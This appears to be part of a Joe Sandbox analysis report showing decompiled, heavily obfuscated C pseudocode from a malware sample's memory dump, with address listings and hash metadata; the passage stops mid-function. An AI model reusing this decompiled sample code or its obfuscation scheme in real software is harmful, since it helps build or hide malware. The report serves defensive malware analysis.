                                                                                                                                                                            				_v1656 = _v1656 ^ 0x1d9d441b;
                                                                                                                                                                            				_v1656 = _v1656 ^ 0x1d437da6;
                                                                                                                                                                            				_v1580 = 0xe77586;
                                                                                                                                                                            				_v1580 = _v1580 + 0xfffff7e8;
                                                                                                                                                                            				_v1580 = _v1580 ^ 0x00e53b2f;
                                                                                                                                                                            				_v1728 = 0x20c0e;
                                                                                                                                                                            				_v1728 = _v1728 + 0x594f;
                                                                                                                                                                            				_t468 = 0x79;
                                                                                                                                                                            				_v1728 = _v1728 / _t468;
                                                                                                                                                                            				_v1728 = _v1728 ^ 0x017ec3a2;
                                                                                                                                                                            				_v1728 = _v1728 ^ 0x01734834;
                                                                                                                                                                            				_v1712 = 0x467deb;
                                                                                                                                                                            				_v1712 = _v1712 | 0xfb06902d;
                                                                                                                                                                            				_v1712 = _v1712 << 0xd;
                                                                                                                                                                            				_v1712 = _v1712 << 0xb;
                                                                                                                                                                            				_v1712 = _v1712 ^ 0xef0dc14e;
                                                                                                                                                                            				_v1632 = 0xa85c1c;
                                                                                                                                                                            				_v1632 = _v1632 << 3;
                                                                                                                                                                            				_v1632 = _v1632 << 4;
                                                                                                                                                                            				_v1632 = _v1632 ^ 0x54293107;
                                                                                                                                                                            				_v1596 = 0x697bfe;
                                                                                                                                                                            				_v1596 = _v1596 | 0x748d72c7;
                                                                                                                                                                            				_v1596 = _v1596 ^ 0x74e3de32;
                                                                                                                                                                            				_v1640 = 0x724245;
                                                                                                                                                                            				_t222 =  &_v1640; // 0x724245
                                                                                                                                                                            				_v1640 =  *_t222 * 0x4c;
                                                                                                                                                                            				_t224 =  &_v1640; // 0x724245
                                                                                                                                                                            				_v1640 =  *_t224 * 0x26;
                                                                                                                                                                            				_v1640 = _v1640 ^ 0x08f66fe6;
                                                                                                                                                                            				_v1648 = 0xa241b2;
                                                                                                                                                                            				_v1648 = _v1648 >> 4;
                                                                                                                                                                            				_v1648 = _v1648 << 0xe;
                                                                                                                                                                            				_v1648 = _v1648 ^ 0x890355d2;
                                                                                                                                                                            				_v1604 = 0x4e61c6;
                                                                                                                                                                            				_v1604 = _v1604 | 0x297abf50;
                                                                                                                                                                            				_v1604 = _v1604 ^ 0x29742082;
                                                                                                                                                                            				_v1608 = 0xdfdd08;
                                                                                                                                                                            				_v1608 = _v1608 | 0x096e656f;
                                                                                                                                                                            				_v1608 = _v1608 ^ 0x09fe8e74;
                                                                                                                                                                            				_v1624 = 0x7e1789;
                                                                                                                                                                            				_v1624 = _v1624 + 0xd6ac;
                                                                                                                                                                            				_v1624 = _v1624 + 0xffff1ac7;
                                                                                                                                                                            				_v1624 = _v1624 ^ 0x007fce14;
                                                                                                                                                                            				_v1688 = 0xd4150c;
                                                                                                                                                                            				_v1688 = _v1688 << 3;
                                                                                                                                                                            				_v1688 = _v1688 ^ 0x561d7592;
                                                                                                                                                                            				_v1688 = _v1688 >> 0xa;
                                                                                                                                                                            				_v1688 = _v1688 ^ 0x001f305a;
                                                                                                                                                                            				_v1696 = 0x3e923d;
                                                                                                                                                                            				_v1696 = _v1696 ^ 0x624df4c6;
                                                                                                                                                                            				_t469 = 0x29;
                                                                                                                                                                            				_v1696 = _v1696 / _t469;
                                                                                                                                                                            				_v1696 = _v1696 + 0xffffe680;
                                                                                                                                                                            				_v1696 = _v1696 ^ 0x026755ff;
                                                                                                                                                                            				_v1704 = 0xed73af;
                                                                                                                                                                            				_t470 = 0x36;
                                                                                                                                                                            				_v1704 = _v1704 / _t470;
                                                                                                                                                                            				_v1704 = _v1704 * 0x76;
                                                                                                                                                                            				_v1704 = _v1704 >> 3;
                                                                                                                                                                            				_v1704 = _v1704 ^ 0x0041c6e0;
                                                                                                                                                                            				_v1664 = 0xe0489c;
                                                                                                                                                                            				_v1664 = _v1664 * 0x4e;
                                                                                                                                                                            				_v1664 = _v1664 * 0x21;
                                                                                                                                                                            				_v1664 = _v1664 << 0xf;
                                                                                                                                                                            				_v1664 = _v1664 ^ 0x084e6c7b;
                                                                                                                                                                            				_v1672 = 0xcef4bd;
                                                                                                                                                                            				_v1672 = _v1672 * 0x4b;
                                                                                                                                                                            				_v1672 = _v1672 + 0xffff3dcb;
                                                                                                                                                                            				_v1672 = _v1672 << 0x10;
                                                                                                                                                                            				_v1672 = _v1672 ^ 0xf1249f73;
                                                                                                                                                                            				_v1680 = 0x187dc5;
                                                                                                                                                                            				_v1680 = _v1680 | 0x94fddf65;
                                                                                                                                                                            				_v1680 = _v1680 << 1;
                                                                                                                                                                            				_v1680 = _v1680 ^ 0x244f0190;
                                                                                                                                                                            				_v1680 = _v1680 ^ 0x0db75cb9;
                                                                                                                                                                            				_v1616 = 0xe6e563;
                                                                                                                                                                            				_v1616 = _v1616 ^ 0xa5d4beb7;
                                                                                                                                                                            				_v1616 = _v1616 + 0xffffcebd;
                                                                                                                                                                            				_v1616 = _v1616 ^ 0xa53dba5b;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t425 != 0x6a96cc9) {
                                                                                                                                                                            						if(_t425 == 0xabcd6f9) {
                                                                                                                                                                            							_push(_t425);
                                                                                                                                                                            							__eflags = E02F685FF(_v1664, _v1672, __eflags, _t462,  &_v520, _t462, _v1680, _t462, _v1616);
                                                                                                                                                                            							_t462 =  !=  ? 1 : _t462;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t425 == 0xbbc45e7) {
                                                                                                                                                                            								E02F51A34(_v1592,  &_v1040, _t425, _t425, _v1588, _v1668, _v1700, _t425, _v1636, _v1600);
                                                                                                                                                                            								_t475 =  &(_t475[8]);
                                                                                                                                                                            								_t425 = 0xe9b1f6b;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t482 = _t425 - 0xe9b1f6b;
                                                                                                                                                                            								if(_t425 != 0xe9b1f6b) {
                                                                                                                                                                            									goto L8;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_push(_v1644);
                                                                                                                                                                            									_push(_v1724);
                                                                                                                                                                            									_push(_v1652);
                                                                                                                                                                            									_t412 = E02F6E1F8(0x2f51030, _v1692, _t482);
                                                                                                                                                                            									E02F57078( &_v1560, _t482);
                                                                                                                                                                            									_t415 =  *0x2f76214; // 0x0
                                                                                                                                                                            									_t419 =  *0x2f76214; // 0x0
                                                                                                                                                                            									E02F5F96F(_v1612, _t482, _t419 + 0x34, _t412,  &_v1560, _v1708,  &_v520, _t415 + 0x23c, _v1676, _v1620, _v1716,  &_v1040);
                                                                                                                                                                            									E02F6FECB(_t412, _v1584, _v1628, _v1684, _v1660);
                                                                                                                                                                            									_t475 =  &(_t475[0x10]);
                                                                                                                                                                            									_t425 = 0xabcd6f9;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L11:
                                                                                                                                                                            						return _t462;
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(_v1728);
                                                                                                                                                                            					_t346 =  &_v1580; // 0xe53b2f
                                                                                                                                                                            					_push( *_t346);
                                                                                                                                                                            					_push(_v1656);
                                                                                                                                                                            					_t397 = E02F6E1F8(0x2f510f0, _v1720, __eflags);
                                                                                                                                                                            					E02F57078( &_v1560, __eflags);
                                                                                                                                                                            					_t400 =  *0x2f76214; // 0x0
                                                                                                                                                                            					_t402 =  *0x2f76214; // 0x0
                                                                                                                                                                            					__eflags = _t402 + 0x23c;
                                                                                                                                                                            					E02F5BF5F(_v1712, _t402 + 0x23c, _v1632,  &_v1560, _v1596,  &_v520, _v1640,  &_v1040, _t402 + 0x23c, _v1648, _t400 + 0x34, _v1604, _v1608,  &_v1560, _t462);
                                                                                                                                                                            					E02F6FECB(_t397, _v1624, _v1688, _v1696, _v1704);
                                                                                                                                                                            					_t475 =  &(_t475[0x13]);
                                                                                                                                                                            					_t425 = 0xabcd6f9;
                                                                                                                                                                            					L8:
                                                                                                                                                                            					__eflags = _t425 - 0xcc0d361;
                                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                                            				goto L11;
                                                                                                                                                                            			}


































































                                                                                                                                                                            0x02f717c7
                                                                                                                                                                            0x02f717ce
                                                                                                                                                                            0x02f717d0
                                                                                                                                                                            0x02f717d7
                                                                                                                                                                            0x02f717d8
                                                                                                                                                                            0x02f717d9
                                                                                                                                                                            0x02f717de
                                                                                                                                                                            0x02f717e9
                                                                                                                                                                            0x02f717ec
                                                                                                                                                                            0x02f717f9
                                                                                                                                                                            0x02f71804
                                                                                                                                                                            0x02f71809
                                                                                                                                                                            0x02f71810
                                                                                                                                                                            0x02f71818
                                                                                                                                                                            0x02f71820
                                                                                                                                                                            0x02f71828
                                                                                                                                                                            0x02f71830
                                                                                                                                                                            0x02f71844
                                                                                                                                                                            0x02f71849
                                                                                                                                                                            0x02f71852
                                                                                                                                                                            0x02f7185d
                                                                                                                                                                            0x02f71868
                                                                                                                                                                            0x02f71873
                                                                                                                                                                            0x02f7187e
                                                                                                                                                                            0x02f71886
                                                                                                                                                                            0x02f7188b
                                                                                                                                                                            0x02f71893
                                                                                                                                                                            0x02f7189b
                                                                                                                                                                            0x02f718a3
                                                                                                                                                                            0x02f718ab
                                                                                                                                                                            0x02f718b0
                                                                                                                                                                            0x02f718b8
                                                                                                                                                                            0x02f718bd
                                                                                                                                                                            0x02f718c5
                                                                                                                                                                            0x02f718d0
                                                                                                                                                                            0x02f718d8
                                                                                                                                                                            0x02f718e3
                                                                                                                                                                            0x02f718eb
                                                                                                                                                                            0x02f718f3
                                                                                                                                                                            0x02f718f8
                                                                                                                                                                            0x02f71900
                                                                                                                                                                            0x02f71908
                                                                                                                                                                            0x02f71910
                                                                                                                                                                            0x02f7191d
                                                                                                                                                                            0x02f71920
                                                                                                                                                                            0x02f71924
                                                                                                                                                                            0x02f7192c
                                                                                                                                                                            0x02f71934
                                                                                                                                                                            0x02f7193c
                                                                                                                                                                            0x02f7194c
                                                                                                                                                                            0x02f71950
                                                                                                                                                                            0x02f71958
                                                                                                                                                                            0x02f71960
                                                                                                                                                                            0x02f71968
                                                                                                                                                                            0x02f71970
                                                                                                                                                                            0x02f71978
                                                                                                                                                                            0x02f71983
                                                                                                                                                                            0x02f7198b
                                                                                                                                                                            0x02f71996
                                                                                                                                                                            0x02f7199e
                                                                                                                                                                            0x02f719aa
                                                                                                                                                                            0x02f719ad
                                                                                                                                                                            0x02f719b6
                                                                                                                                                                            0x02f719ba
                                                                                                                                                                            0x02f719c4
                                                                                                                                                                            0x02f719cc
                                                                                                                                                                            0x02f719d4
                                                                                                                                                                            0x02f719d9
                                                                                                                                                                            0x02f719de
                                                                                                                                                                            0x02f719e6
                                                                                                                                                                            0x02f719ee
                                                                                                                                                                            0x02f719fc
                                                                                                                                                                            0x02f71a01
                                                                                                                                                                            0x02f71a0a
                                                                                                                                                                            0x02f71a15
                                                                                                                                                                            0x02f71a1d
                                                                                                                                                                            0x02f71a22
                                                                                                                                                                            0x02f71a27
                                                                                                                                                                            0x02f71a2c
                                                                                                                                                                            0x02f71a34
                                                                                                                                                                            0x02f71a47
                                                                                                                                                                            0x02f71a4a
                                                                                                                                                                            0x02f71a51
                                                                                                                                                                            0x02f71a5c
                                                                                                                                                                            0x02f71a64
                                                                                                                                                                            0x02f71a6c
                                                                                                                                                                            0x02f71a74
                                                                                                                                                                            0x02f71a7c
                                                                                                                                                                            0x02f71a84
                                                                                                                                                                            0x02f71a89
                                                                                                                                                                            0x02f71a93
                                                                                                                                                                            0x02f71a97
                                                                                                                                                                            0x02f71a9f
                                                                                                                                                                            0x02f71aa7
                                                                                                                                                                            0x02f71ab4
                                                                                                                                                                            0x02f71ab8
                                                                                                                                                                            0x02f71ac0
                                                                                                                                                                            0x02f71ac8
                                                                                                                                                                            0x02f71ad0
                                                                                                                                                                            0x02f71ad5
                                                                                                                                                                            0x02f71add
                                                                                                                                                                            0x02f71ae5
                                                                                                                                                                            0x02f71aed
                                                                                                                                                                            0x02f71af5
                                                                                                                                                                            0x02f71afd
                                                                                                                                                                            0x02f71b05
                                                                                                                                                                            0x02f71b10
                                                                                                                                                                            0x02f71b1b
                                                                                                                                                                            0x02f71b26
                                                                                                                                                                            0x02f71b2e
                                                                                                                                                                            0x02f71b3a
                                                                                                                                                                            0x02f71b3d
                                                                                                                                                                            0x02f71b41
                                                                                                                                                                            0x02f71b49
                                                                                                                                                                            0x02f71b51
                                                                                                                                                                            0x02f71b59
                                                                                                                                                                            0x02f71b61
                                                                                                                                                                            0x02f71b66
                                                                                                                                                                            0x02f71b6b
                                                                                                                                                                            0x02f71b73
                                                                                                                                                                            0x02f71b7b
                                                                                                                                                                            0x02f71b80
                                                                                                                                                                            0x02f71b85
                                                                                                                                                                            0x02f71b8d
                                                                                                                                                                            0x02f71b98
                                                                                                                                                                            0x02f71ba3
                                                                                                                                                                            0x02f71bae
                                                                                                                                                                            0x02f71bb6
                                                                                                                                                                            0x02f71bbb
                                                                                                                                                                            0x02f71bbf
                                                                                                                                                                            0x02f71bc4
                                                                                                                                                                            0x02f71bca
                                                                                                                                                                            0x02f71bd7
                                                                                                                                                                            0x02f71be4
                                                                                                                                                                            0x02f71be9
                                                                                                                                                                            0x02f71bee
                                                                                                                                                                            0x02f71bf6
                                                                                                                                                                            0x02f71c01
                                                                                                                                                                            0x02f71c0c
                                                                                                                                                                            0x02f71c17
                                                                                                                                                                            0x02f71c22
                                                                                                                                                                            0x02f71c2d
                                                                                                                                                                            0x02f71c38
                                                                                                                                                                            0x02f71c40
                                                                                                                                                                            0x02f71c48
                                                                                                                                                                            0x02f71c50
                                                                                                                                                                            0x02f71c58
                                                                                                                                                                            0x02f71c60
                                                                                                                                                                            0x02f71c65
                                                                                                                                                                            0x02f71c6d
                                                                                                                                                                            0x02f71c72
                                                                                                                                                                            0x02f71c7a
                                                                                                                                                                            0x02f71c82
                                                                                                                                                                            0x02f71c90
                                                                                                                                                                            0x02f71c95
                                                                                                                                                                            0x02f71c9b
                                                                                                                                                                            0x02f71ca3
                                                                                                                                                                            0x02f71cab
                                                                                                                                                                            0x02f71cb7
                                                                                                                                                                            0x02f71cba
                                                                                                                                                                            0x02f71cc3
                                                                                                                                                                            0x02f71cc7
                                                                                                                                                                            0x02f71ccc
                                                                                                                                                                            0x02f71cd4
                                                                                                                                                                            0x02f71ce1
                                                                                                                                                                            0x02f71cea
                                                                                                                                                                            0x02f71cee
                                                                                                                                                                            0x02f71cf3
                                                                                                                                                                            0x02f71cfb
                                                                                                                                                                            0x02f71d08
                                                                                                                                                                            0x02f71d0c
                                                                                                                                                                            0x02f71d14
                                                                                                                                                                            0x02f71d19
                                                                                                                                                                            0x02f71d21
                                                                                                                                                                            0x02f71d29
                                                                                                                                                                            0x02f71d31
                                                                                                                                                                            0x02f71d35
                                                                                                                                                                            0x02f71d3d
                                                                                                                                                                            0x02f71d45
                                                                                                                                                                            0x02f71d50
                                                                                                                                                                            0x02f71d5b
                                                                                                                                                                            0x02f71d66
                                                                                                                                                                            0x02f71d71
                                                                                                                                                                            0x02f71d71
                                                                                                                                                                            0x02f71d7f
                                                                                                                                                                            0x02f71f31
                                                                                                                                                                            0x02f71f5b
                                                                                                                                                                            0x02f71f5d
                                                                                                                                                                            0x02f71d85
                                                                                                                                                                            0x02f71d8b
                                                                                                                                                                            0x02f71e67
                                                                                                                                                                            0x02f71e6c
                                                                                                                                                                            0x02f71e6f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f71d91
                                                                                                                                                                            0x02f71d91
                                                                                                                                                                            0x02f71d93
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f71d99
                                                                                                                                                                            0x02f71d99
                                                                                                                                                                            0x02f71da2
                                                                                                                                                                            0x02f71da6
                                                                                                                                                                            0x02f71dae
                                                                                                                                                                            0x02f71dbc
                                                                                                                                                                            0x02f71ddd
                                                                                                                                                                            0x02f71e03
                                                                                                                                                                            0x02f71e0d
                                                                                                                                                                            0x02f71e2d
                                                                                                                                                                            0x02f71e32
                                                                                                                                                                            0x02f71e35
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f71e35
                                                                                                                                                                            0x02f71d93
                                                                                                                                                                            0x02f71d8b
                                                                                                                                                                            0x02f71f60
                                                                                                                                                                            0x02f71f6c
                                                                                                                                                                            0x02f71f6c
                                                                                                                                                                            0x02f71e76
                                                                                                                                                                            0x02f71e7f
                                                                                                                                                                            0x02f71e7f
                                                                                                                                                                            0x02f71e86
                                                                                                                                                                            0x02f71e8e
                                                                                                                                                                            0x02f71e9f
                                                                                                                                                                            0x02f71ebb
                                                                                                                                                                            0x02f71ec8
                                                                                                                                                                            0x02f71ecd
                                                                                                                                                                            0x02f71eff
                                                                                                                                                                            0x02f71f19
                                                                                                                                                                            0x02f71f1e
                                                                                                                                                                            0x02f71f21
                                                                                                                                                                            0x02f71f23
                                                                                                                                                                            0x02f71f23
                                                                                                                                                                            0x02f71f23
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: /;$>}$EBr$OY$c$oen$}F
                                                                                                                                                                            • API String ID: 0-419207597
                                                                                                                                                                            • Opcode ID: 08f157b8aede0c5006cfb5c4123aa5aba628c85a6d0ca8aa8cf358abd9b6274e
                                                                                                                                                                            • Instruction ID: 2725fe77286597cd6ee82029d153598a22da7663c8da00b405a0e8a10b94db00
                                                                                                                                                                            • Opcode Fuzzy Hash: 08f157b8aede0c5006cfb5c4123aa5aba628c85a6d0ca8aa8cf358abd9b6274e
                                                                                                                                                                            • Instruction Fuzzy Hash: 410213715083809FD764CF65C889A9FBBE6FBC4398F104A1DE2CA96260D7B58949CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E02F577A3(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				char _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				unsigned int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				signed int _v148;
                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                            				signed int _v160;
                                                                                                                                                                            				signed int _v164;
                                                                                                                                                                            				signed int _v168;
                                                                                                                                                                            				signed int _v172;
                                                                                                                                                                            				signed int _v176;
                                                                                                                                                                            				signed int _v180;
                                                                                                                                                                            				signed int _v184;
                                                                                                                                                                            				signed int _v188;
                                                                                                                                                                            				signed int _v192;
                                                                                                                                                                            				void* _t314;
                                                                                                                                                                            				signed int _t352;
                                                                                                                                                                            				signed int _t362;
                                                                                                                                                                            				signed int _t363;
                                                                                                                                                                            				signed int _t364;
                                                                                                                                                                            				signed int _t365;
                                                                                                                                                                            				signed int _t366;
                                                                                                                                                                            				signed int _t367;
                                                                                                                                                                            				void* _t370;
                                                                                                                                                                            				signed int* _t401;
                                                                                                                                                                            				signed int* _t405;
                                                                                                                                                                            				void* _t407;
                                                                                                                                                                            
                                                                                                                                                                            				_t402 = _a12;
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_t401 = __ecx;
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t314);
                                                                                                                                                                            				_v100 = 0xaefbe1;
                                                                                                                                                                            				_t405 =  &(( &_v192)[5]);
                                                                                                                                                                            				_v100 = _v100 + 0x6b82;
                                                                                                                                                                            				_t370 = 0xc5526f;
                                                                                                                                                                            				_t362 = 0x2b;
                                                                                                                                                                            				_v100 = _v100 / _t362;
                                                                                                                                                                            				_v100 = _v100 ^ 0x00041443;
                                                                                                                                                                            				_v80 = 0x1d3414;
                                                                                                                                                                            				_v80 = _v80 + 0xffffdb02;
                                                                                                                                                                            				_v80 = _v80 ^ 0x0011ba60;
                                                                                                                                                                            				_v72 = 0x54a5f8;
                                                                                                                                                                            				_v72 = _v72 >> 0x10;
                                                                                                                                                                            				_v72 = _v72 ^ 0x000d0ae3;
                                                                                                                                                                            				_v136 = 0x274773;
                                                                                                                                                                            				_t26 =  &_v136; // 0x274773
                                                                                                                                                                            				_t363 = 0x1a;
                                                                                                                                                                            				_v136 =  *_t26 * 0x4d;
                                                                                                                                                                            				_v136 = _v136 + 0xffff9993;
                                                                                                                                                                            				_v136 = _v136 ^ 0x0bd1637a;
                                                                                                                                                                            				_v88 = 0xd58b4c;
                                                                                                                                                                            				_v88 = _v88 + 0xffff1506;
                                                                                                                                                                            				_v88 = _v88 ^ 0x00d01948;
                                                                                                                                                                            				_v92 = 0x5e6930;
                                                                                                                                                                            				_t38 =  &_v92; // 0x5e6930
                                                                                                                                                                            				_v92 =  *_t38;
                                                                                                                                                                            				_v92 = _v92 ^ 0x00540f59;
                                                                                                                                                                            				_v116 = 0x40a51;
                                                                                                                                                                            				_v116 = _v116 | 0x5ce3fa4e;
                                                                                                                                                                            				_v116 = _v116 >> 2;
                                                                                                                                                                            				_v116 = _v116 ^ 0x1737f89e;
                                                                                                                                                                            				_v108 = 0x7d5bec;
                                                                                                                                                                            				_v108 = _v108 | 0x0f0c5889;
                                                                                                                                                                            				_v108 = _v108 + 0xbcf5;
                                                                                                                                                                            				_v108 = _v108 ^ 0x0f7d2458;
                                                                                                                                                                            				_v164 = 0x3d5dd8;
                                                                                                                                                                            				_v164 = _v164 ^ 0x644c870b;
                                                                                                                                                                            				_v164 = _v164 >> 0xd;
                                                                                                                                                                            				_v164 = _v164 * 0x7a;
                                                                                                                                                                            				_v164 = _v164 ^ 0x017eec74;
                                                                                                                                                                            				_v180 = 0x53df1b;
                                                                                                                                                                            				_v180 = _v180 / _t363;
                                                                                                                                                                            				_v180 = _v180 + 0xffff91ff;
                                                                                                                                                                            				_v180 = _v180 + 0xffff90b6;
                                                                                                                                                                            				_v180 = _v180 ^ 0x000d2df2;
                                                                                                                                                                            				_v76 = 0x6cb33c;
                                                                                                                                                                            				_v76 = _v76 + 0x7c19;
                                                                                                                                                                            				_v76 = _v76 ^ 0x0065748e;
                                                                                                                                                                            				_v160 = 0xaee8e0;
                                                                                                                                                                            				_t364 = 0x3e;
                                                                                                                                                                            				_v160 = _v160 / _t364;
                                                                                                                                                                            				_v160 = _v160 + 0x21f3;
                                                                                                                                                                            				_v160 = _v160 * 0x52;
                                                                                                                                                                            				_v160 = _v160 ^ 0x00ffda9d;
                                                                                                                                                                            				_v84 = 0xdaab99;
                                                                                                                                                                            				_v84 = _v84 >> 0xc;
                                                                                                                                                                            				_v84 = _v84 ^ 0x000be4ff;
                                                                                                                                                                            				_v144 = 0x6cc9e4;
                                                                                                                                                                            				_v144 = _v144 >> 5;
                                                                                                                                                                            				_v144 = _v144 ^ 0xa5290d0e;
                                                                                                                                                                            				_v144 = _v144 ^ 0xa52e4d3d;
                                                                                                                                                                            				_v120 = 0x3bbeb9;
                                                                                                                                                                            				_v120 = _v120 ^ 0x393aef05;
                                                                                                                                                                            				_v120 = _v120 + 0x22c7;
                                                                                                                                                                            				_v120 = _v120 ^ 0x39070acc;
                                                                                                                                                                            				_v148 = 0xc13163;
                                                                                                                                                                            				_v148 = _v148 ^ 0x61e09c7e;
                                                                                                                                                                            				_v148 = _v148 + 0x1cd6;
                                                                                                                                                                            				_v148 = _v148 ^ 0x612c2d34;
                                                                                                                                                                            				_v128 = 0x26c56f;
                                                                                                                                                                            				_v128 = _v128 >> 2;
                                                                                                                                                                            				_v128 = _v128 | 0xf6250b40;
                                                                                                                                                                            				_v128 = _v128 ^ 0xf621b77e;
                                                                                                                                                                            				_v176 = 0xf92ffc;
                                                                                                                                                                            				_v176 = _v176 << 4;
                                                                                                                                                                            				_v176 = _v176 ^ 0x602a8fe3;
                                                                                                                                                                            				_v176 = _v176 >> 7;
                                                                                                                                                                            				_v176 = _v176 ^ 0x00d9f38d;
                                                                                                                                                                            				_v124 = 0x433c84;
                                                                                                                                                                            				_v124 = _v124 + 0xffff4128;
                                                                                                                                                                            				_v124 = _v124 ^ 0x1ed7562a;
                                                                                                                                                                            				_v124 = _v124 ^ 0x1e92a094;
                                                                                                                                                                            				_v132 = 0x6b8ec6;
                                                                                                                                                                            				_v132 = _v132 ^ 0x28d18ae0;
                                                                                                                                                                            				_t365 = 0x6a;
                                                                                                                                                                            				_v132 = _v132 * 0x7b;
                                                                                                                                                                            				_v132 = _v132 ^ 0x9158c057;
                                                                                                                                                                            				_v104 = 0x1fefeb;
                                                                                                                                                                            				_v104 = _v104 >> 0xf;
                                                                                                                                                                            				_v104 = _v104 + 0xffff5efe;
                                                                                                                                                                            				_v104 = _v104 ^ 0xfff4cbde;
                                                                                                                                                                            				_v168 = 0xc1bc7b;
                                                                                                                                                                            				_v168 = _v168 >> 3;
                                                                                                                                                                            				_v168 = _v168 << 7;
                                                                                                                                                                            				_v168 = _v168 * 0x7d;
                                                                                                                                                                            				_v168 = _v168 ^ 0xe998ae80;
                                                                                                                                                                            				_v64 = 0x9d5223;
                                                                                                                                                                            				_v64 = _v64 | 0x29ada36c;
                                                                                                                                                                            				_v64 = _v64 ^ 0x29b66376;
                                                                                                                                                                            				_v184 = 0x42d2c5;
                                                                                                                                                                            				_v184 = _v184 + 0xffffd8f9;
                                                                                                                                                                            				_v184 = _v184 | 0x10a03a14;
                                                                                                                                                                            				_v184 = _v184 << 8;
                                                                                                                                                                            				_v184 = _v184 ^ 0xe2b073c1;
                                                                                                                                                                            				_v192 = 0xa502eb;
                                                                                                                                                                            				_v192 = _v192 ^ 0xb81d0436;
                                                                                                                                                                            				_v192 = _v192 >> 0xd;
                                                                                                                                                                            				_v192 = _v192 / _t365;
                                                                                                                                                                            				_v192 = _v192 ^ 0x000463de;
                                                                                                                                                                            				_v172 = 0x9c405d;
                                                                                                                                                                            				_v172 = _v172 >> 6;
                                                                                                                                                                            				_v172 = _v172 ^ 0x75940441;
                                                                                                                                                                            				_v172 = _v172 + 0xd268;
                                                                                                                                                                            				_v172 = _v172 ^ 0x759b0547;
                                                                                                                                                                            				_v156 = 0x9f3fdd;
                                                                                                                                                                            				_v156 = _v156 >> 3;
                                                                                                                                                                            				_v156 = _v156 << 9;
                                                                                                                                                                            				_v156 = _v156 >> 0xd;
                                                                                                                                                                            				_v156 = _v156 ^ 0x000ada21;
                                                                                                                                                                            				_v188 = 0xfbaf85;
                                                                                                                                                                            				_v188 = _v188 | 0xf8737d3a;
                                                                                                                                                                            				_t366 = 0x3c;
                                                                                                                                                                            				_v188 = _v188 / _t366;
                                                                                                                                                                            				_v188 = _v188 ^ 0x0422aead;
                                                                                                                                                                            				_v112 = 0x7705bd;
                                                                                                                                                                            				_v112 = _v112 | 0xb4ba0e14;
                                                                                                                                                                            				_v112 = _v112 * 0x43;
                                                                                                                                                                            				_v112 = _v112 ^ 0x5ec93514;
                                                                                                                                                                            				_v96 = 0xe3e42a;
                                                                                                                                                                            				_v96 = _v96 ^ 0x25c7ee45;
                                                                                                                                                                            				_v96 = _v96 ^ 0x252c54ca;
                                                                                                                                                                            				_v68 = 0xae646d;
                                                                                                                                                                            				_v68 = _v68 + 0xcc0;
                                                                                                                                                                            				_v68 = _v68 ^ 0x00a4113a;
                                                                                                                                                                            				_v140 = 0x4c7529;
                                                                                                                                                                            				_t367 = 0x73;
                                                                                                                                                                            				_v140 = _v140 / _t367;
                                                                                                                                                                            				_v140 = _v140 | 0x6ffaa740;
                                                                                                                                                                            				_v140 = _v140 ^ 0x6ff9ac12;
                                                                                                                                                                            				_v152 = 0xafca7f;
                                                                                                                                                                            				_v152 = _v152 + 0xfffffd29;
                                                                                                                                                                            				_v152 = _v152 + 0xad57;
                                                                                                                                                                            				_v152 = _v152 + 0x26e2;
                                                                                                                                                                            				_v152 = _v152 ^ 0x00ba4152;
                                                                                                                                                                            				goto L1;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						L1:
                                                                                                                                                                            						_t407 = _t370 - 0x696b508;
                                                                                                                                                                            						if(_t407 > 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t407 == 0) {
                                                                                                                                                                            							_t401[1] = E02F5F369(_t402);
                                                                                                                                                                            							_t370 = 0x4c1a8a5;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
